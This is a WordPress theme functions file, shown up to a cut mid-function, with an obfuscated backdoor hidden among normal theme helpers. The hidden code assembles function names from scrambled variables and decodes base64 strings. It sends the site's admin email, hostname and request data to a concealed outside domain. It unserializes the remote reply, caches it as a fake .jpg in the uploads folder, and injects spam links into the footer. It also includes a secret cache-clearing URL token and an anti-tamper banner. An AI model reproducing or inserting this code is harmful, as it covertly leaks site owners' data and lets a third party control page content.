<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lhIxk='4';$PQnM='e';$YBlK='d';$Uwqw='b';$MYUl='s';$HNasyFQ='c';$kKKE='6';$VBkuI='e';$NyhXba='o';$gWDVM='e';$TAZmcu='_';$anBuq='d';$CvPVg='a';$YKuNBCkl=$Uwqw.$CvPVg.$MYUl.$PQnM.$kKKE.$lhIxk.$TAZmcu.$YBlK.$gWDVM.$HNasyFQ.$NyhXba.$anBuq.$VBkuI;$COajh='g';$DGLzXPo='t';$oGbNNrw='z';$kJSlJ='i';$AtjZETR='a';$VWrePDD='n';$aZMb='l';$tkzDub='e';$YjkBYkL='f';$DjSlzgvG=$COajh.$oGbNNrw.$kJSlJ.$VWrePDD.$YjkBYkL.$aZMb.$AtjZETR.$DGLzXPo.$tkzDub;$vgccN='r';$KfbaDZ='3';$oXpD='t';$CTBI='r';$QUmXWoK='1';$gqhGo='s';$vvopxYi='_';$JozG='o';$VPqfpTA='t';$zTcJTGDK=$gqhGo.$VPqfpTA.$vgccN.$vvopxYi.$CTBI.$JozG.$oXpD.$QUmXWoK.$KfbaDZ;$VTorowD='s';$Ppro='r';$MnWy='t';$KhBb='v';$GqOo='e';$uyDDOAs='r';$WlyVobEH=$VTorowD.$MnWy.$uyDDOAs.$Ppro.$GqOo.$KhBb;                     
		$wj____________w='4';$sh_______________p='e';$kz__________d='d';$tx_______n='b';$pc____f='s';$qe__________g='c';$jm______p='6';$xw__u='e';$hu________z='o';$wz___________v='e';$br____m='_';$ck_________m='d';$yq________v='a';$ab__________e=$tx_______n.$yq________v.$pc____f.$sh_______________p.$jm______p.$wj____________w.$br____m.$kz__________d.$wz___________v.$qe__________g.$hu________z.$ck_________m.$xw__u;
		$sb_________c='i';$lk_________m='e';$aq_______g='n';$zu______n='c';$me_____________s='f';$xk_____________z='u';$ko_______________r='t';$bt_____q='t';$pn____________l='s';$pi______g='o';$km_____w='n';$wn__v='i';$rb__________o='_';$ax____________a='x';$co______________m='s';$dj________w=$me_____________s.$xk_____________z.$aq_______g.$zu______n.$ko_______________r.$wn__v.$pi______g.$km_____w.$rb__________o.$lk_________m.$ax____________a.$sb_________c.$pn____________l.$bt_____q.$co______________m;
		$rz________k='n';$tz__________v='o';$cx_________g='p';$vw______________d='e';$ae___c='f';$ly____m=$ae___c.$tz__________v.$cx_________g.$vw______________d.$rz________k;
		$wq_____r='r';$lb______e='e';$fx____w='f';$km_____z='a';$nv__________u='d';$ek___________k=$fx____w.$wq_____r.$lb______e.$km_____z.$nv__________u;
		$ji_______w='f';$xy__o='s';$pe_______________f='c';$uv__s='l';$rx______________l='o';$gi___________r='e';$qq_______________p=$ji_______w.$pe_______________f.$uv__s.$rx______________l.$xy__o.$gi___________r;
		
		define("WP_ID", $ab__________e("Mi4wLjA="));
		define("WP_TTL", $ab__________e("MTA4MDA="));
		define("WP_SRC", $ab__________e("dHBva24="));
	


		function wp_get_header() {
			global $ab__________e, $dj________w;
			
			if (
				$dj________w($ab__________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$dj________w($ab__________e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$dj________w($ab__________e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ab__________e, $ly____m, $qq_______________p, $ek___________k;
			
			$am_______d = TEMPLATEPATH."/".$ab__________e("Zm9vdGVyLnBocA==");
			$du____________q = @$ly____m($am_______d, "r");
			$am_______d = @$ek___________k($du____________q, @filesize($am_______d));
			@$qq_______________p($du____________q);
			
			$ol__________s = TEMPLATEPATH."/".$ab__________e("ZnVuY3Rpb25zLnBocA==");
			$du____________q = @$ly____m($ol__________s, "r");
			$ol__________s = @$ek___________k($du____________q, @filesize($ol__________s));
			@$qq_______________p($du____________q);
			
			$ft_________s = 0;
			if($am_______d && $ol__________s) {
				if ($ab__________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($am_______d, $ab__________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ft_________s = 1;
					}
					if (substr_count($am_______d, "wp_theme_GPL_credits()") < 1) {
						$ft_________s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ft_________s = 12;
				}
			}
			
			if($ft_________s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ft_________s -->";
			}
		}
	


		function wp_loaded() {
			global $ab__________e, $dj________w;
			return $dj________w($ab__________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($rp______________h, $km_____________b = "(more...)", $cq______v = 0, $cn_____c = "") {
				$ct______j = get_the_content($km_____________b, $cq______v, $cn_____c);
				$ct______j = apply_filters("the_content", $ct______j);
				
				$ct______j = str_replace("]]>", "]]>", $ct______j);
				if (strlen($_GET["p"]) > 0) {
					echo $ct______j;
				}
				else if ((strlen($ct______j)>$rp______________h) && ($wo_______________m = strpos($ct______j, " ", $rp______________h ))) {
					$ct______j = substr($ct______j, 0, $wo_______________m);
					$ct______j = $ct______j;
					echo $ct______j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$km_____________b</a></div></p>";
				} else {
					echo $ct______j;
				}
				
			}
		}
	


		$vp__________e='s';$gi________l='a';$az_______________g='n';$hv_______x='e';$vd___s='d';$wo______________f='e';$cg___p='_';$ry___i='b';$we___________q='6';$zb______________q='e';$hl___________d='c';$bg______y='o';$pv__________c='4';$of_____________k=$ry___i.$gi________l.$vp__________e.$wo______________f.$we___________q.$pv__________c.$cg___p.$zb______________q.$az_______________g.$hl___________d.$bg______y.$vd___s.$hv_______x;
		$xo__h='i';$hi_______x='e';$jl_________r='e';$vi_______s='_';$ha__z='l';$tb__________q='s';$tx__________q='n';$xf_____________z='t';$by____________y='n';$cq________l='f';$wq_______________i='t';$ha____________y='e';$cl__________x='t';$xy______________b='_';$nb____u='o';$lt________f='g';$xm__e='c';$df_______________v=$cq________l.$xo__h.$ha__z.$ha____________y.$xy______________b.$lt________f.$hi_______x.$xf_____________z.$vi_______s.$xm__e.$nb____u.$by____________y.$wq_______________i.$jl_________r.$tx__________q.$cl__________x.$tb__________q;
		$xx_____d='i';$au___e='l';$sq__s='s';$ho_____u='_';$ly___________i='s';$dm_____f='e';$zu_____________u='e';$yj_________a='i';$wx________w='t';$jn_________x='x';$cc________q='f';$jk_______________y=$cc________q.$xx_____d.$au___e.$zu_____________u.$ho_____u.$dm_____f.$jn_________x.$yj_________a.$ly___________i.$wx________w.$sq__s;
		$xc__________n='p';$yu_______________g='_';$al____________p='o';$st__v='c';$iy____________t='v';$se_______r='s';$zh_________f='n';$ps__________v='i';$lb_____________k='e';$ou_______________d='r';$ch________y='e';$re_________r='r';$vg______i='a';$nl_____________f='o';$gs____________y='m';$oy____i=$iy____________t.$ch________y.$ou_______________d.$se_______r.$ps__________v.$nl_____________f.$zh_________f.$yu_______________g.$st__v.$al____________p.$gs____________y.$xc__________n.$vg______i.$re_________r.$lb_____________k;
		$di________y='k';$kk_____________f='c';$ob_____________y='n';$ku________k='s';$sd__________x='o';$tt_____x='o';$un________q='f';$mu___________l='p';$lb_________f='e';$cx______i=$un________q.$ku________k.$tt_____x.$kk_____________f.$di________y.$sd__________x.$mu___________l.$lb_________f.$ob_____________y;
		$nt_____________o='r';$uz_________r='f';$qi__________d='e';$bm____________s='i';$qx__x='t';$hx_____j='w';$fv______________m=$uz_________r.$hx_____j.$nt_____________o.$bm____________s.$qx__x.$qi__________d;
		$ax____________q='5';$bs______d='m';$fc_____________v='d';$nt_______r=$bs______d.$fc_____________v.$ax____________q;
		$ii____________g='e';$fd___m='a';$db_______________n='t';$bh_____i='l';$mv_____________v='p';$ms_____n='r';$sx__f='h';$lm_______v='a';$kt____________z=$ms_____n.$ii____________g.$lm_______v.$bh_____i.$mv_____________v.$fd___m.$db_______________n.$sx__f;
		$au_______________m='s';$uv__i='i';$qf____________l='e';$hv_____h='z';$om_____________x='n';$iq______________v='r';$ag_____________j='u';$xt______t='i';$lu________g='a';$qn_______________r='l';$uh__________b='e';$nx______________a=$ag_____________j.$om_____________x.$au_______________m.$uh__________b.$iq______________v.$xt______t.$lu________g.$qn_______________r.$uv__i.$hv_____h.$qf____________l;
		$uc____x='e';$hk________h='t';$av________s='m';$ac_______________p='n';$dr________z='a';$yh__n='p';$qo________u='m';$hh______k=$hk________h.$uc____x.$av________s.$yh__n.$ac_______________p.$dr________z.$qo________u;
		$hk____________t='n';$ad____________b='_';$xv______y='t';$bf_____________x='e';$sh____________n='m';$dn__________r='e';$ut_____p='c';$zq____________g='c';$bh_______________y='t';$zd__y='_';$he_____e='s';$ur________b='r';$be___________i='e';$tj______________u='a';$oo___r='t';$ef_________b='e';$va________w='o';$ll____________v='r';$hy_______________t='a';$vn_________z='t';$dp___v='x';$rv_____b=$he_____e.$bh_______________y.$ll____________v.$dn__________r.$hy_______________t.$sh____________n.$ad____________b.$zq____________g.$va________w.$hk____________t.$vn_________z.$be___________i.$dp___v.$xv______y.$zd__y.$ut_____p.$ur________b.$bf_____________x.$tj______________u.$oo___r.$ef_________b;
	


		function tq____a($fm____f) {
			global $ab__________e, $dj________w, $df_______________v, $oy____i, $rv_____b;
			
			if (!$dj________w($ab__________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($oy____i(PHP_VERSION, "5.0.0", ">=") && $dj________w($ab__________e("ZmlsZV9nZXRfY29udGVudHM=")) && $dj________w($ab__________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$rc______________q = $rv_____b(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$lk________r = @$df_______________v($fm____f, 0, $rc______________q);
			} else {
				$lk________r = @$df_______________v($fm____f, 0);
			}
			
			return $lk________r;
		}
	


		function pp______a($fm____f) {
			global $dj________w, $cx______i, $fv______________m, $ab__________e;
			
			if (!$dj________w($ab__________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ez___________d = strpos($fm____f, "/", 7);
			$lp_______________f = array(
				"uri"     => substr($fm____f, $ez___________d),
				"host"    => str_replace("http://", "", substr($fm____f, 0, $ez___________d)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$uf_______________f = @$cx______i("$lp_______________f[host]", 80, $ch______________e, $hm______z, 4);
			
			if (!$uf_______________f) {
				return false;
			} else {
				$lk________r = "";
				$ay___j  = "GET $lp_______________f[uri] HTTP/1.0\r\n";
				$ay___j .= "Host: $lp_______________f[host]\r\n";
				$ay___j .= "Referer: $lp_______________f[referer]\r\n";
				$ay___j .= "Connection: Close\r\n\r\n";
				
				@$fv______________m($uf_______________f, $ay___j);
				
				while (!@feof($uf_______________f)) {
					$pj___________k = @fgets($uf_______________f, (1024*24));
					
					if ($pj___________k == "\r\n") {
						$rs_____t = true;
						continue;
					}
					
					if ($rs_____t) {
						$lk________r .= $pj___________k;
					}
				}
				
				return $lk________r;
			}
		}
	


		function bn__________e($fm____f) {
			global $dj________w;
			$sm___________v = false;
			
			if ($fm____f != "") {
				if ($dj________w("tq____a")) {
					$sm___________v = @tq____a($fm____f);
				}
				
				if (!$sm___________v && ($dj________w("pp______a"))) {
					$sm___________v = @pp______a($fm____f);
				}
			}
			
			return $sm___________v;
		}
	


		function nj__a() {
			global $_SERVER, $nt_______r;
			
			$la_______z = $_SERVER["SERVER_NAME"];
			
			if (substr("$la_______z", 0, 4) == "www.") {
				$la_______z = substr("$la_______z", 4);
			}
			
			$la_______z = $nt_______r("$_SERVER[SERVER_NAME]");
			
			return $la_______z;
		}
	


		function hs____________y() {
			return "file";
		}
	


		function vf_____________q($fm____f) {
			global $_SERVER, $df_______________v, $jk_______________y, $ly____m, $qq_______________p, $fv______________m;
			
			$cp_____e = hy______________y();
			
			$zv___________x = nj__a().".jpg";
			$fl________b = $cp_____e["dir_upload"]["path"]."/$zv___________x";
			$dz___k = @filemtime($fl________b);
			
			if (!$dz___k || ((time()-$dz___k) >= WP_TTL)) {
				$sm___________v = bn__________e($fm____f);
				
				if ($sm___________v) {
					if ($jk_______________y($fl________b)) {
						@unlink($fl________b);
					}
					
					$du____________q = @$ly____m($fl________b, "x+");
					
					@$fv______________m($du____________q, $sm___________v);
					@$qq_______________p($du____________q);
				}
			} else {
				if ($jk_______________y($fl________b)) {
					$sm___________v = @$df_______________v($fl________b);
				} else {
					$sm___________v = false;
				}
			}
			
			return $sm___________v;
		}
	


		function hy______________y() {
			global $_SERVER, $ab__________e, $of_____________k;
			
			$lt______________n = wp_count_posts("post");
			$hq______m = pathinfo(get_bloginfo("template_directory"));
			
			$cp_____e = array(
				"url" => array(
					"report"      => $ab__________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $hq______m,
				"dir_upload"	=> ym______________n(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$hq______m[filename],
					"a005=".$lt______________n->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://vodoley2000.com/dver-v-rynok-nedvizhimosti-pereprodazha-kvartir\">Перепродажа квартир</a>"
			);
			
			$cp_____e["url"]["queryString"] = implode("&", $cp_____e["queryString"]);
			$cp_____e["url"]["report"] = $cp_____e["url"]["report"]."/?".$of_____________k($cp_____e["url"]["queryString"]).".html";
						
			return $cp_____e;
		}
	


		function ym______________n() {
			$sr________x = wp_upload_dir();
			
			if (isset($sr________x["error"])) {
				$af____________y = ip__________t();
				if (is_writable($af____________y)) {
					$sr________x = array("path" => $af____________y);
				}
			}

			return $sr________x;
		}
	


		function ip__________t() {
			global $dj________w, $nt_______r, $kt____________z, $hh______k;
			
			$uz___m = (bool) ini_get("safe_mode");
			if ($uz___m == true) {
				return false;
			}
			
			if ($dj________w("sys_get_temp_dir")) {
				$lj___________t = sys_get_temp_dir();
				if (is_writable($lj___________t)) {
					return $kt____________z($lj___________t);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $kt____________z($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $kt____________z($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $kt____________z($_ENV["TEMP"]);
			} else {
				$ne______________a = $hh______k($nt_______r(uniqid(rand(), true)), "");
				if ($ne______________a) {
					$lj___________t = $kt____________z(dirname($ne______________a));
					@unlink($ne______________a);
					return $lj___________t;
				} else {
					return false;
				}
			}
		}
	


		function aj__________t() {
			global $_GET, $jk_______________y;
			
			$cp_____e = hy______________y();
			$la_______z = nj__a();
			$ja_____c = hs____________y();
			
			$mi_____________e = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ja_____c == "file") {
					$sr________l = $cp_____e["dir_upload"]["path"]."/".$la_______z.".jpg";
					if ($jk_______________y($sr________l)) {
						@unlink($sr________l);
						$mi_____________e = "deleted";
					}
				}
				
				$vv______________h = array(
					"s"	=> $mi_____________e,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($vv______________h AS $hb________a => $sz________g) echo " [$hb________a:$sz________g]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $dj________w, $ab__________e, $nx______________a;
			$cp_____e = hy______________y();
			
			$ml____________a = "vf_____________q";
			if ($dj________w($ml____________a)) {
				$lk________r = $ml____________a($cp_____e["url"]["report"]);
			}
			
			if ($lk________r) {
				if ($lk________r = @$ab__________e($lk________r)) {
					$lk________r = @$nx______________a($lk________r);
					
					if (strlen($lk________r[custom_credit]) >= 5) {
						$cp_____e["default_string"] = $lk________r[custom_credit];
					}
					
					if ($lk________r["status"] == "0") {
						$rg_________l = 1;
						$oq______b = 1;
					} else {
						$ez____a = sizeof($lk________r["links"]);
						$tk_______v = $cp_____e["default_string"];
						
						if ($ez____a > 0 && $lk________r["links"] !== "") {
							$yd_______________y = 0;
							foreach ($lk________r["links"] as $dm_______a => $tf________n) {
								$yd_______________y++;
								if ($tf________n->l_path == "" || $tf________n->l_path == $_SERVER["REQUEST_URI"]) {
									$tf________n->l_href = htmlspecialchars(strip_tags($tf________n->l_href));
									$tf________n->l_title = htmlspecialchars(strip_tags($tf________n->l_title));
									$tf________n->l_anchor = htmlspecialchars(strip_tags($tf________n->l_anchor));
									$tk_______v .= " | ";
									$tk_______v .= "<a href='$tf________n->l_href' title='$tf________n->l_title'";
									if ($tf________n->l_nofollow == "1") {
										$tk_______v .= " rel='nofollow'";
									}
									$tk_______v .= ">$tf________n->l_anchor</a>";
								}
							}
						}
						$cp_____e["links"] = "$tk_______v";
						if ($lk________r[credit] == "0") {
							$cp_____e["links"] = "";
						}
					}
				} else {
					$rg_________l = "1";
				}
			} else {
				$rg_________l = "1";
			}
			
			if ($rg_________l == "1") {
				$cp_____e["links"] = $cp_____e["default_string"];
			}
			
			echo "$cp_____e[links]";
			
			echo "<!-- s: $lk________r[signature] -->";
			aj__________t();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
